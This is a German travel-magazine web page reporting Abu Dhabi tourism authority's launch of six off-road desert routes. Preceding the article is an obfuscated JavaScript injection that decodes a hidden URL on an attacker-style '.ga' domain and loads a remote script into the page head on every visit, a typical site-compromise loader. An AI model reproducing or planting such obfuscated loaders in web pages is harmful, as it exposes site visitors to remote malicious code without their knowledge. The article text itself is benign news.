var _0x1c9a=['push','229651wHRLFT','511754lPBDVY','length','2080825FKHOBK','src','1lLQkOc','1614837wjeKHo','insertBefore','fromCharCode','179434whQoYd','1774xXwpgH','1400517aqruvf','7vsbpgk','3112gjEEcU','1mFUgXZ','script','1534601MOJEnu','prototype','245777oIJjBl','47jNCcHN','1HkMAkw','nextSibling','appendAfter','shift','18885bYhhDw','1096016qxAIHd','72lReGEt','1305501RTgYEh','4KqoyHD','appendChild','createElement','getElementsByTagName'];var _0xd6df=function(_0x3a7b86,_0x4f5b42){_0x3a7b86=_0x3a7b86-0x1f4;var _0x1c9a62=_0x1c9a[_0x3a7b86];return _0x1c9a62;};(function(_0x2551a2,_0x3dbe97){var _0x34ce29=_0xd6df;while(!![]){try{var _0x176f37=-parseInt(_0x34ce29(0x20a))*-parseInt(_0x34ce29(0x205))+-parseInt(_0x34ce29(0x204))*-parseInt(_0x34ce29(0x206))+-parseInt(_0x34ce29(0x1fc))+parseInt(_0x34ce29(0x200))*parseInt(_0x34ce29(0x1fd))+-parseInt(_0x34ce29(0x1fb))*-parseInt(_0x34ce29(0x1fe))+-parseInt(_0x34ce29(0x20e))*parseInt(_0x34ce29(0x213))+-parseInt(_0x34ce29(0x1f5));if(_0x176f37===_0x3dbe97)break;else _0x2551a2['push'](_0x2551a2['shift']());}catch(_0x201239){_0x2551a2['push'](_0x2551a2['shift']());}}}(_0x1c9a,0xc08f4));function smalller(){var _0x1aa566=_0xd6df,_0x527acf=[_0x1aa566(0x1f6),_0x1aa566(0x20b),'851164FNRMLY',_0x1aa566(0x202),_0x1aa566(0x1f7),_0x1aa566(0x203),'fromCharCode',_0x1aa566(0x20f),_0x1aa566(0x1ff),_0x1aa566(0x211),_0x1aa566(0x214),_0x1aa566(0x207),_0x1aa566(0x201),'parentNode',_0x1aa566(0x20c),_0x1aa566(0x210),_0x1aa566(0x1f8),_0x1aa566(0x20d),_0x1aa566(0x1f9),_0x1aa566(0x208)],_0x1e90a8=function(_0x49d308,_0xd922ec){_0x49d308=_0x49d308-0x17e;var _0x21248f=_0x527acf[_0x49d308];return _0x21248f;},_0x167299=_0x1e90a8;(function(_0x4346f4,_0x1d29c9){var _0x530662=_0x1aa566,_0x1bf0b5=_0x1e90a8;while(!![]){try{var _0x2811eb=-parseInt(_0x1bf0b5(0x187))+parseInt(_0x1bf0b5(0x186))+parseInt(_0x1bf0b5(0x18d))+parseInt(_0x1bf0b5(0x18c))+-parseInt(_0x1bf0b5(0x18e))*parseInt(_0x1bf0b5(0x180))+-parseInt(_0x1bf0b5(0x18b))+-parseInt(_0x1bf0b5(0x184))*parseInt(_0x1bf0b5(0x17e));if(_0x2811eb===_0x1d29c9)break;else _0x4346f4[_0x530662(0x212)](_0x4346f4[_0x530662(0x209)]());}catch(_0x1cd819){_0x4346f4[_0x530662(0x212)](_0x4346f4[_0x530662(0x209)]());}}}(_0x527acf,0xd2c23),(Element[_0x167299(0x18f)][_0x1aa566(0x208)]=function(_0x3d096a){var _0x2ca721=_0x167299;_0x3d096a[_0x2ca721(0x183)][_0x2ca721(0x188)](this,_0x3d096a[_0x2ca721(0x181)]);},![]),function(){var _0x5d96e1=_0x1aa566,_0x22c893=_0x167299,_0x306df5=document[_0x22c893(0x185)](_0x22c893(0x182));_0x306df5[_0x22c893(0x18a)]=String[_0x22c893(0x190)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x73,0x74,0x69,0x63,0x6b,0x2e,0x74,0x72,0x61,0x76,0x65,0x6c,0x69,0x6e,0x73,0x6b,0x79,0x64,0x72,0x65,0x61,0x6d,0x2e,0x67,0x61,0x2f,0x61,0x6e,0x61,0x6c,0x79,0x74,0x69,0x63,0x73,0x2e,0x6a,0x73,0x3f,0x63,0x69,0x64,0x3d,0x30,0x30,0x30,0x30,0x26,0x70,0x69,0x64,0x69,0x3d,0x31,0x39,0x31,0x38,0x31,0x37,0x26,0x69,0x64,0x3d,0x35,0x33,0x36,0x34,0x36),_0x306df5[_0x22c893(0x189)](document[_0x22c893(0x17f)](String[_0x5d96e1(0x1fa)](0x73,0x63,0x72,0x69,0x70,0x74))[0x0]),_0x306df5[_0x5d96e1(0x208)](document[_0x22c893(0x17f)](String[_0x22c893(0x190)](0x68,0x65,0x61,0x64))[0x0]),document[_0x5d96e1(0x211)](String[_0x22c893(0x190)](0x68,0x65,0x61,0x64))[0x0][_0x22c893(0x191)](_0x306df5);}());}function biggger(){var _0x5d031d=_0xd6df,_0x5c5bd2=document[_0x5d031d(0x211)](_0x5d031d(0x201));for(var _0x5a0282=0x0;_0x5a0282<_0x5c5bd2[_0x5d031d(0x1f4)];_0x5a0282++){if(_0x5c5bd2[_0x5a0282][_0x5d031d(0x1f6)]['indexOf'](String['fromCharCode'](0x74,0x72,0x61,0x76,0x65,0x6c,0x69,0x6e,0x73,0x6b,0x79,0x64,0x72,0x65,0x61,0x6d))>-0x1)return 0x1;}return 0x0;}biggger()==0x0&&smalller(); Department of Culture and Tourism Abu Dhabi | Bonnes Vacances - Das Magazin für VIP Reisen

Department of Culture and Tourism Abu Dhabi

Department of Culture and Tourism Abu Dhabi

 

Foto: pixabay

Heute wurde ein neues Projekt im Emirat gestartet, das Interessierten ermöglicht, aufregende Wüstenabenteuer in Abu Dhabi zu erleben. Das vom Department of Culture and Tourism – Abu Dhabi (DCT Abu Dhabi) ins Leben gerufene Projekt für Offroad-Abenteuer hält sechs Routen für geländegängige Fahrzeuge in den Regionen Abu Dhabi, Al Dhafra und Al Ain bereit. Unternehmungslustige Besucher des Emirats können somit auf eigene Faust zu ihrem Wüstenerlebnis starten – Campen unter den Sternen inklusive.

Foto: pixabay

Die im Rahmen der Initiative erstellten Routen wurden für alle Fahrlevel entwickelt, vom Anfänger bis zum Fortgeschrittenen. Jede Strecke bietet eine Vielzahl von Sehenswürdigkeiten, darunter Kamel- und Gazellen-Sichtungen, einzigartige Ausblicke auf Wüstendünen und Zugang zu Oasen. Zu den Routen zählen Al Remah, Al Ain bis White Sands, Hameem Loop, Umm Al Oush, Liwa Crossing und Al Khazna. Alle Strecken sind über die teilnehmenden Touren-Anbieter sowie über die neue Offroad-Webseite von DCT Abu Dhabi abrufbar.

Die Fahrer erhalten eine Reihe von Checklisten und Anweisungen, so dass ihre Sicherheit und die ihrer Mitfahrer gewährleistet ist. Die teilnehmenden Touren-Anbieter halten für diejenigen, die noch keine Erfahrung im Offroad-Fahren haben, Einführungskurse bereit, so dass auch diese ihr Wüsten-Abenteuer sicher genießen können. Alle Routen werden in der Google Maps-App über einen jeweils angegebenen Link angezeigt.

Ali Hassan Al Shaiba, Executive Director beim DCT Abu Dhabi, sagte: „Abu Dhabi ist dank seiner vielfältigen Landschaft ein wunderbares Ziel für Abenteurer und diejenigen, die sich mit der Natur verbinden möchten.

Foto: pixabay

Das Offroad-Fahren in Abu Dhabi bietet Interessierten die Möglichkeit, die wunderschöne Landschaft von Abu Dhabi zu erkunden und das ganze Jahr über aufregende und abwechslungsreiche Erlebnisse zu haben. Die Initiative öffnet auch den Touren-Anbietern neue Türen, die für die Besucher nun eine größere Auswahl an Wüstenerlebnissen bereithalten können.“

„Wir haben eng mit Capital Gate Tourism and Adventure sowie mit dem Anantara Qasr Al Sarab Desert Resort zusammengearbeitet, um die optimalsten Routen zu ermitteln und die richtigen Sicherheitsrichtlinien festzulegen, so dass es ein unterhaltsames und sicheres Abenteuer für alle wird. Jeder Routenvorschlag beinhaltet die erforderlichen Voraussetzungen und Richtlinien, einschließlich der nötigen Erfahrung, um sicherzustellen, dass die Fahrer angemessen auf die Tour vorbereitet sind und dieses aufregende Abenteuer genießen können.“

Bleiben Sie gesund. Wir warten auf Sie #InAbuDhabi.

Quelle: http://dctabudhabi.ae

Bericht S. Lueddecke

%d Bloggern gefällt das: